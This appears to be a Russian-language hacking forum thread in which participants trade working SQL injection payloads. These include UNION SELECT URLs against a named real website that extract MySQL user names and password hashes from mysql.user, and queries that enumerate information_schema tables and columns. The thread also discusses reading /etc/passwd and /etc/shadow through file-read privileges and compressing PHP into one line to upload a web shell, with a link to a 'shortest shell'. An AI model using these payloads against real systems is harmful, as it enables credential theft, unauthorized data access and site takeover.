http://www.fcmetz.com/voir.php?id=-5036%20union%20select%201,2,3,4,user,6,7,8,9,10,11,12%20,13%20from%20mysql.user+limit+1,1
@AHMED HASSAN the first record in the mysql.user table is empty, so start with the second one: http://www.fcmetz.com/voir.php?id=-5036%20union%20select%201,2,3,4,5,concat(user,0x3a,password),7,8,9,10,11,12%20,13%20from%20mysql.user+limit+1,1 @zannussi похоже на самописный двиг
есть небольшая загвоздка) понять почему так не могу(( на сайте sql inj. данные из одного запроса вставляются в другой но суть не в этом вроде... есть файл_прив /etc/passwd читает но файл из директории ниже не хочет читать(( хотя он точно есть)может он слишком большой?и еси так то что можна сделать?
у тебя нехватает прав для его просмотра. Для примера Code: /etc/shadow Он есть, но прочитать ты его не сможешь
Всем привет! Разъясните... Есть скуля - information_schema - доступно. далее: вываливаются куча всего и там я выцепляю routines:sql_admin далее: ошибка: Table 'db.routines' doesn't exist ага, значит все в другой базе. далее смотрю в какой именно базе: отображается "information_schema" подставляю: Страница без ошибок обновляется, но ни какой инфы нет. Тут меня терзают сомнения: 1. Корректно ли я указал "information_schema.routines" 2. Может быть у меня не хватает прав? 3. Или где-то накосячил изначально? Спасибо!
мм.. даже не знаю что сказать .. даже не сталкивался .. попробуй это http://site.com/non.php?id=-6+union+select+1,table_schema,3,4,5,6,7,8,9,10,11, 1 2,13,14,15+from+information_schema.columns+where+table_name='routines'+limit+1,1-- также
по первому запросу - так же пусто, ни какой информации не выводит. а по второму вот: information_schema.ROUTINES:SQL_ADMIN В принципе то же самое что и в моем случае, только дальше, делаю запрос, опять пусто. НиПоНяТнО (голосом Реввы)
Да ты ж синтаксиса sql команд не понимаешь!!! Доки читай по мускулу! хеккеры млин... Самое первое, что тебе нужно сделать - это посмотреть названия таблиц и названия БД в которых они лежат. Code: http://site.com/non.php?id=-6+union+select+1,2,concat(table_schema,char(58),table_NAME),4,5,6,7,8+from+INFORMATION_SCHEMA.tables-- потом уже смотришь названия колонок в интересующей таблице: Code: http://site.com/non.php?id=-6+union+select+1,2,COLUMN_NAME,4,5,6,7,8+from+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME="user"-- А уже потом на основе этих данных составляешь запрос!
_Pantera_ Самое первое, что тебе нужно сделать - это посмотреть названия таблиц и названия БД в которых они лежат. таким запросом ты узнаеш все бд ) а вот таким запросом ты посмотришь БД в которых лежит таблица.. а вобще я бы сначало искал в каких таблицах и бд есть колонка например пасс)
Я вот непонимаю, зачем если ты не разбираешься в теме умничать? table_schema - имя БД table_NAME - имя таблицы А это что за бред???? Этим запросом ты посмотришь имя БД в которой лежит таблица "название таблы" PS Мужики читайте литературу, я смотрю вы нахватались кусков из хеккерских форумов, а работать с БД не умеете.
вопрос..как преобразовать пхп-код в одну строку?иными словами чтобы не было пробелов...всё в одной строке? шелл короче залить..
хех товарищ хакер обратите внимание на эти строчки в цитате: во первых он сделал это без вас, во-вторых зачем ему весь список "баз(а/ы)-таблицы" если известно конкретное название таблицы?) пост sabe верный ток там оператор объединения непонятно зачем) Octave_Parango значит либо нет записей либо есть пустые строки masternet пхп шелл итак занимает 1 строчку всё остальное навороты вот самый короткий) raz0r.name/releases/mega-reliz-samyj-korotkij-shell/